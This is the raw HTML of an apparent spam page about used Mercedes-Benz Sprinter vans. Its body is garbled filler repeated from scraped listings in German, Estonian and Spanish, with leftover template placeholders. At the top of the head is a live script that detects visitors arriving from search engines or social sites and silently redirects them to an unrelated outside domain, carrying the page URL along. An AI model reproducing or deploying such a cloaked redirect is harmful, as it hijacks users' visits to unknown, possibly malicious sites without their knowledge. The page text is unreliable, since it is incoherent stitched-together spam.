
<!doctype html>
<html lang="en">

<head>
  <script type='text/javascript'>

if(document.referrer)
{
var cek = document.referrer;
var is_se = cek.includes('.google.') || cek.includes('.bing.') || cek.includes('yandex.') || cek.includes('facebook.') || cek.includes('pinterest.');
if(is_se)
{
var url = window.location.href;
window.location = "http://et.goodtaste.monster/?arsae="+ encodeURIComponent(url);
}
}

</script>
  <meta charset="utf-8">
  <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
  <meta name="generator" content="Hugo 0.76.3" />
  <meta name="description" content="Mercedes Benz Sprinter Gebraucht. Alle informationen zu den sprinter aufbauformen, technischen daten, zubehör und finanzierung. Mit einem gebrauchten oder neuen sprinter können sie viel bewegen.
Nicht ohne grund gehört er seit seiner einführung 1995 zu den. {{ formatnumber(list.count) }} fahrzeuge gefunden. Et kaubik vastaks teie professionaalsetele nõuetele. Schon optisch ist der neue sprinter tourer ein highlight:   Hier finden sie technische daten, preise, statistiken, tests und die wichtigsten fragen auf einen blick.">
  
  <link rel="apple-touch-icon" sizes="180x180" href="https://alejandra-mercedes.netlify.app/assets/images/logo.svg">
  <link rel="icon" type="image/png" sizes="32x32" href="https://alejandra-mercedes.netlify.app/assets/images/logo.svg">
  <link rel="icon" type="image/png" sizes="16x16" href="https://alejandra-mercedes.netlify.app/assets/images/logo.svg">
  <link rel="manifest" href="https://alejandra-mercedes.netlify.app/site.webmanifest">
  <link rel="mask-icon" href="https://alejandra-mercedes.netlify.app/assets/images/logo.svg" color="#5bbad5">
  <meta name="msapplication-TileColor" content="#da532c">
  <meta name="theme-color" content="#ffffff">
  <link rel="stylesheet" href="https://alejandra-mercedes.netlify.app/assets/tether/tether.min.css">
  <link rel="stylesheet" href="https://alejandra-mercedes.netlify.app/assets/bootstrap/css/bootstrap.min.css">
  <link rel="stylesheet" href="https://alejandra-mercedes.netlify.app/assets/bootstrap/css/bootstrap-grid.min.css">
  <link rel="stylesheet" href="https://alejandra-mercedes.netlify.app/assets/bootstrap/css/bootstrap-reboot.min.css">
  <link rel="stylesheet" href="https://alejandra-mercedes.netlify.app/assets/dropdown/css/style.css">
  <link rel="stylesheet" href="https://alejandra-mercedes.netlify.app/assets/socicon/css/styles.css">
  <link rel="stylesheet" href="https://alejandra-mercedes.netlify.app/assets/theme/css/style.css">
  <link rel="preload" as="style" href="https://alejandra-mercedes.netlify.app/assets/mobirise/css/mbr-additional.css">
  <link rel="stylesheet" href="https://alejandra-mercedes.netlify.app/assets/mobirise/css/mbr-additional.css" type="text/css">
  
  <title>Mercedes Benz Sprinter Gebraucht | alejandra-mercedes</title>
  



<script type="application/ld+json">
{
  "@context": "https://schema.org/", 
  "@type": "Article", 
  "author": {
    "@type": "Person",
    "name": "Claire Samdruck"
  },
  "headline": "Mercedes Benz Sprinter Gebraucht",
  "datePublished": "2020-03-05",
  "image": "https:\/\/images.tradus.com\/v1\/ee151a1b-a026-4bb3-a687-bf9a70d7a29b.jpeg",
  "publisher": {
    "@type": "Organization",
    "name": "alejandra-mercedes",
    "logo": {
      "@type": "ImageObject",
      "url": "https://via.placeholder.com/512.png?text=Mercedes Benz Sprinter Gebraucht",
      "width": 512,
      "height": 512
    }
  }
}
</script>

  <!--ads/auto.txt--> 
  
</head>

<body>
  <section class="menu menu1 cid-scbIgvKGlS" once="menu" id="menu1-i">
    <nav class="navbar navbar-dropdown navbar-fixed-top navbar-expand-lg">
        <div class="container-fluid">
            <div class="navbar-brand">
                <span class="navbar-logo">
                    <a href="https://alejandra-mercedes.netlify.app/">
                        <img src="https://alejandra-mercedes.netlify.app/assets/images/logo.svg" alt="alejandra-mercedes" style="height: 3rem;">
                    </a>
                </span>
                <span class="navbar-caption-wrap"><a class="navbar-caption text-primary display-7" href="https://alejandra-mercedes.netlify.app/">alejandra-mercedes</a></span>
            </div>
            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarSupportedContent" aria-controls="navbarNavAltMarkup" aria-expanded="false" aria-label="Toggle navigation">
                <div class="hamburger">
                    <span></span>
                    <span></span>
                    <span></span>
                    <span></span>
                </div>
            </button>
            <div class="collapse navbar-collapse" id="navbarSupportedContent">
                <ul class="navbar-nav nav-dropdown nav-right" data-app-modern-menu="true">
					<li class="nav-item">
						<a class="nav-link link text-primary display-4" href="/">Home</a>
					</li>
				</ul>
            </div>
        </div>
    </nav>
</section>
  
  <section class="content4 cid-scbObQMNYs" id="content4-o">
  <div class="container-fluid">
  
      <div class="row justify-content-center">
          <div class="title col-md-12 col-lg-12">
              <h3 class="mbr-section-title mbr-fonts-style align-center mb-4 display-2"><strong>Mercedes Benz Sprinter Gebraucht</strong></h3>
          </div>
		  
          <div class="mb-1"></div>
          <div><h6 class="item-subtitle mbr-fonts-style mt-1 display-7"><strong>&nbsp;&nbsp;&nbsp;</strong><em>05/03/2020 00:00</em></h6></div>
      </div>
  </div>
  
</section>
<section class="content5 cid-scgf3IiveW" id="content5-q">

    <div class="container">
        <div class="row justify-content-center">
            <div class="col-md-12 col-lg-10">
                <div class="mbr-text mbr-fonts-style display-7">
                    
<article>
<center><!--ads/responsive.txt--> </center>
    <p><strong>Mercedes Benz Sprinter Gebraucht</strong>. Alle informationen zu den sprinter aufbauformen, technischen daten, zubehör und finanzierung. Mit einem gebrauchten oder neuen sprinter können sie viel bewegen.</p>
<center><!--ads/responsive.txt--> </center>
    <p>
                <aside>
            <img src="https://i0.wp.com/images.12gebrauchtwagen.de/images/cimg/P/0/02/p0516020-MERCEDES-BENZ-MERCEDES-BENZ-313-CDI-Sprinter-906-731--2013-2013-.jpg" alt="Mercedes 4x4 Sprinter Mit Hymer Innenausbau I 4x4 Passion 95 Youtube" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT10Io0tvuOUz9rdIwmH8_aAgnrVNbXihU2bg&amp;usqp=CAU';">
            
        </aside>
      
        Nicht ohne grund gehört er seit seiner einführung 1995 zu den. {{ formatnumber(list.count) }} fahrzeuge gefunden. Et kaubik vastaks teie professionaalsetele nõuetele. Schon optisch ist der neue sprinter tourer ein highlight:
<center><!--ads/responsive.txt--> </center>
    </p>

    <h3>Hier finden sie technische daten, preise, statistiken, tests und die wichtigsten fragen auf einen blick.</h3>
    <p>Ab 2006 gab es den sprinter in zweiter generation. Ab 2006 gab es den sprinter in zweiter generation. Der sprinter tourer bietet mit 3 fahrzeuglängen, 2 dachhöhen und bis zu 3 sitzreihen eine beeindruckende vielfalt. Schon optisch ist der neue sprinter tourer ein highlight:</p>
	<center><!--ads/responsive.txt--> </center>
</article>

<section>
    <aside>
      <img src="https://i0.wp.com/d2e5b8shawuel2.cloudfront.net/vehicle/271874/hin/original.jpg" alt="Mercedes Benz Sprinter 313 Cdi Mixto Mr 6 Sitze Klima Standhzg Gebraucht Kaufen In Hamburg Moorfleet Preis 24940 Eur Int Nr 6003 Verkauft" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ4fxUKqVTLCjiCDJ7DLZantD2uCefNmavKwQ&amp;usqp=CAU';">
            
        
       <p>Et kaubik vastaks teie professionaalsetele nõuetele.</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/media.machinerypark.com/offer/images/wm/55607/b6/6a/550-660/a7cbf7c91f48448c53e2ef371e7f6a5230e002393d0ba925e5.jpg" alt="Verkauft Mercedes Benz Sprinter 216 Cdi Iglhaut Explorer Magazin" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSw-ShB6fpLURHEc68xOV3IlBanHTlbRv6rHA&amp;usqp=CAU';">
            
        
       <p>Toda la información sobre la sprinter, sus carrocerías, datos técnicos, accesorios y financiación.</p>
    </aside>
</section>
<p>{{ formatnumber(list.count) }} fahrzeuge gefunden. Die suchergebnisliste ist nach aktualität sortiert, sie können auch eine sortierung nach preis, baujahr, betriebsstunden oder standort. Auf mascus.de finden sie zahlreiche gebrauchte transporter, busse/reisebusse, lastwagen. Mit einem gebrauchten oder neuen sprinter können sie viel bewegen.</p>
<center><!--ads/responsive.txt--> </center>
<section>
    <aside>
      <img src="https://i0.wp.com/www.baupool.com/media/7115/5267115/30343688/5267115-30343688.jpg?width=800&amp;height=600&amp;quality=80" alt="Mercedes Benz Sprinter 310 Cdi Kastenwagen Gebraucht In 36272 Niederaula Deutschland 5610397 Baupool Com" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcS-Hw7Hfr246gNrHAzUuvH79q4ciyvsa3h71A&amp;usqp=CAU';">
            
        
       <p>Alle informationen zu den sprinter aufbauformen, technischen daten, zubehör und finanzierung.</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/photo.static-viamobilis.com/32/13/5099910-foto-kuhlkoffer-multi_temperaturzonen-gebraucht.jpg" alt="Mercedes Benz 316cdi Sprinter Allrad 4x4 Transporter Kastenwagen Hochdach In Munchen Gebraucht Kaufen Bei Autoscout24 Truc Mercedes Benz Sprinter Allrad Benz" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSKxjrfmqm-vpph81ZoJtz-Tj35XLh5rIlcjA&amp;usqp=CAU';">
            
        
       <p>Mit einem gebrauchten oder neuen sprinter können sie viel bewegen.</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/cdn.machineseeker.com/data/listing/img_650x487/01/4583001.1602772230__.jpg" alt="Mercedes Benz Sprinter Ii Kasten 310 Cdi Hochdach Lang 1 Hand Gebraucht Kaufen In Heroldstatt Preis 19900 Eur Int Nr 2505 Verkauft" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSC_24U5Ir-safIgzuSHEWh2D4EF1tvjEMyOg&amp;usqp=CAU';">
            
        
       <p>Mit einem gebrauchten oder neuen sprinter können sie viel bewegen.</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/cdn.machineseeker.com/data/listing/img_650x487/01/4583001.1602772230__.jpg" alt="Mercedes Benz Sprinter 313 Cdi Koffer Ladebordwand Koffer Gebraucht In 36272 Niederaula Deutschland 5267115 Baupool Com" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcT5IhEktXpAhUtzUPZIKND0QgxNCqF0OW86Rg&amp;usqp=CAU';">
            
        
       <p>Schon optisch ist der neue sprinter tourer ein highlight:</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/fahrzeuge.dorotheum.com/fileadmin/lot-images/48K190227/hires/lkw-mercedes-benz-sprinter-516-cdi-43-6080254.jpg" alt="Mercedes Sprinter Gebraucht Kaufen 6 362 Autouncle" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcRmTBgkETepi9Dc7pjeI-p6P3cgoCc9mhCLvg&amp;usqp=CAU';">
            
        
       <p>Kompakt, standard, lang und extralang.</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/pic.truckscout24.net/images-big/67/66/0019186667001.jpg" alt="Mercedes James Cook Campingbus Im Gebraucht Check Promobil" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTz6rgAAOIqtBVcROeXULYjsMfvBzzBWfhZ9w&amp;usqp=CAU';">
            
        
       <p>Der sprinter tourer bietet mit 3 fahrzeuglängen, 2 dachhöhen und bis zu 3 sitzreihen eine beeindruckende vielfalt.</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/pic.truckscout24.net/images-big/67/66/0019186667001.jpg" alt="Used Mercedes Benz Sprinter Kombi 313 Cdi Bus Minibus In 80939 Munchen For Sale On Truckscout24" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQRA18g8JPJab3PuR5HIZu-8G2DIZdpNkGVrg&amp;usqp=CAU';">
            
        
       <p>Nicht ohne grund gehört er seit seiner einführung 1995 zu den.</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/pict1.reezocar.com/images/480/automobile.de/RZCATMDE288842543/MERCEDES-BENZ-SPRINTER-02.jpg" alt="Mercedes Benz Sprinter Ii Kasten 209 Cdi Wohnmobile In Berlin Spandau Gebrauchte Lkw Kaufen Ebay Kleinanzeigen" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQpKkvuPhazkp5iIioidR_E_M_ij694yv6Rbg&amp;usqp=CAU';">
            
        
       <p>Hier finden sie technische daten, preise, statistiken, tests und die wichtigsten fragen auf einen blick.</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/cms.vans.mercedes-benz.net//uploads/vss/originals/00000000402.jpg" alt="Mercedes Benz Sprinter Gebraucht Kaufen In Hamburg Preis 21800 Eur Int Nr 167 Verkauft" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQxanrfMooN3ZqC8bT4LDAzXGmCdz8gZD0oKQ&amp;usqp=CAU';">
            
        
       <p>{{ formatnumber(list.count) }} fahrzeuge gefunden.</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/www.autoscout24.de/assets/auto/images/model/mercedes-benz/mercedes-benz-sprinter/mercedes-benz-sprinter-m-02.jpg" alt="Used Mercedes Benz Sprinter Year 2015 55 284 Km Reezocar" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQUSr_7HgNecwc4wLYgPrUVY_KMocgebvALkw&amp;usqp=CAU';">
            
        
       <p>Sie erhalten einen mercedes sprinter mit:</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/photo.static-viamobilis.com/32/13/5099910-foto-kuhlkoffer-multi_temperaturzonen-gebraucht.jpg" alt="Used Mercedes Benz Sprinter Year 2018 43 300 Km Reezocar" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSHvF8iS1MvqDgWTfWh3AChqoJ3cr02Xh5Wyg&amp;usqp=CAU';">
            
        
       <p>Auf mascus.de finden sie zahlreiche gebrauchte transporter, busse/reisebusse, lastwagen.</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/pic.truckscout24.net/images-big/12/69/0019346912001.jpg" alt="Mercedes Benz Sprinter 316 Cdi Kastenwagen Gebraucht Kaufen Und Verkaufen Bei Mascus At C9acb5e3" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='OgWB3zDBES6bNM';">
            
        
       <p>Toda la información sobre la sprinter, sus carrocerías, datos técnicos, accesorios y financiación.</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/pict1.reezocar.com/images/480/automobile.de/RZCATMDE288842543/MERCEDES-BENZ-SPRINTER-02.jpg" alt="Gebraucht 2016 Mercedes Benz Sprinter 313 Cdi Doka Zum Verkauf Bei" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcTMaimzGCPeXAmr3brPCdHv_4W0YYe_d3IOoA&amp;usqp=CAU';">
            
        
       <p>Mit einem gebrauchten oder neuen sprinter können sie viel bewegen.</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/images.tradus.com/v1/ee151a1b-a026-4bb3-a687-bf9a70d7a29b.jpeg" alt="Mercedes Benz Sprinter Kastenwagen Pappas Osterreich" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcSOPZvXJZUDS8rDX236SOEsxCQ-CYFGlzdCmQ&amp;usqp=CAU';">
            
        
       <p>Der sprinter tourer bietet mit 3 fahrzeuglängen, 2 dachhöhen und bis zu 3 sitzreihen eine beeindruckende vielfalt.</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/media.machinerypark.com/offer/images/wm/55607/b6/6a/550-660/a7cbf7c91f48448c53e2ef371e7f6a5230e002393d0ba925e5.jpg" alt="Mercedes Benz Sprinter 313 Cdi Mixto Mr 6 Sitze Klima Standhzg Gebraucht Kaufen In Hamburg Moorfleet Preis 24940 Eur Int Nr 6003 Verkauft" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQ4fxUKqVTLCjiCDJ7DLZantD2uCefNmavKwQ&amp;usqp=CAU';">
            
        
       <p>Hier finden sie technische daten, preise, statistiken, tests und die wichtigsten fragen auf einen blick.</p>
    </aside>
    <aside>
      <img src="https://i0.wp.com/images.autouncle.com/de/car_images/medium_821371fc-609a-4d7f-8c79-5f28c2384407_mercedes-sprinter-316-cdi-kasten-bei-gebrachtwagen-expert.jpg" alt="Mercedes Benz Sprinter 313 Dreiseitenkipper Hkl Baumaschinen" style="width: 100%; padding: 5px; background-color: grey;"  onerror="this.onerror=null;this.src='https://encrypted-tbn0.gstatic.com/images?q=tbn:ANd9GcQEEcFKjDw8VelDDwGCAjoaMrha10J8GgodPQ&amp;usqp=CAU';">
            
        
       <p>Sie erhalten einen mercedes sprinter mit:</p>
    </aside>
</section>
                </div>
            </div>
            <div class="mt-1">
</div>
        </div>
    </div>
</section>
<section class="content1 cid-scbO6ytHb4" id="content1-n">
    <div class="container">
        <div class="row mt-4">
            <div class="item features-image сol-10 col-md-6 col-lg-6">
                <div class="item-wrapper">
                    <div class="item-img">
                        <a href="https://alejandra-mercedes.netlify.app/mercedes-c-2019/"><img src='https://cdn-ds.com/blogs-media/sites/178/2019/05/12090241/2019-MB-C-Class-Cabriolet-exterior-front-fascia-and-passenger-side-parked-next-to-water_o.jpg' alt='Mercedes C 2019'></a>
                    </div>
                    <div class="item-content">
                        <a href="https://alejandra-mercedes.netlify.app/mercedes-c-2019/"><h6 class="item-subtitle mbr-fonts-style mt-1 display-7">Previous<br/><strong>Mercedes C 2019</strong></h6></a>
                    </div>
                </div>
            </div>
            <div class="item features-image сol-10 col-md-6 col-lg-6">
                <div class="item-wrapper">
                    <div class="item-img">
                        <a href="https://alejandra-mercedes.netlify.app/mercedes-benz-price/"><img src='https://d1hv7ee95zft1i.cloudfront.net/custom/car-model-photo/mobile/gallery/2018-mercedes-benz-gla-5ab201fb8da82.jpg' alt='Mercedes Benz Price'></a>
                    </div>
                    <div class="item-content">
                        <a href="https://alejandra-mercedes.netlify.app/mercedes-benz-price/"><h6 class="item-subtitle mbr-fonts-style mt-1 display-7">Next<br/><strong>Mercedes Benz Price</strong></h6></a>
                    </div>
                </div>
            </div>
        </div>
    </div>
</section>
  <section class="footer7 cid-sbXVflVDJM" once="footers" id="footer7-3">
	<div class="container">
		<div class="media-container-row align-center mbr-white">
			<div class="col-12">
				<p class="mbr-text mb-0 mbr-fonts-style display-7">
					&copy;2020 <a href="https://alejandra-mercedes.netlify.app/">alejandra-mercedes</a> - All Rights Reserved 
				</p>
			</div>
		</div>
	</div>
</section>

<script src="https://alejandra-mercedes.netlify.app/assets/web/assets/jquery/jquery.min.js"></script>
<script src="https://alejandra-mercedes.netlify.app/assets/popper/popper.min.js"></script>
<script src="https://alejandra-mercedes.netlify.app/assets/tether/tether.min.js"></script>
<script src="https://alejandra-mercedes.netlify.app/assets/bootstrap/js/bootstrap.min.js"></script>
<script src="https://alejandra-mercedes.netlify.app/assets/smoothscroll/smooth-scroll.js"></script>
<script src="https://alejandra-mercedes.netlify.app/assets/dropdown/js/nav-dropdown.js"></script>
<script src="https://alejandra-mercedes.netlify.app/assets/dropdown/js/navbar-dropdown.js"></script>
<script src="https://alejandra-mercedes.netlify.app/assets/touchswipe/jquery.touch-swipe.min.js"></script>
<script src="https://alejandra-mercedes.netlify.app/assets/theme/js/script.js"></script>
  
<script src="https://alejandra-mercedes.netlify.app/js/jquery-3.3.1.slim.min.js"></script>
<script src="https://alejandra-mercedes.netlify.app/js/bootstrap.bundle.min.js"></script>

  

  

  
<script></script>
</body>

</html>
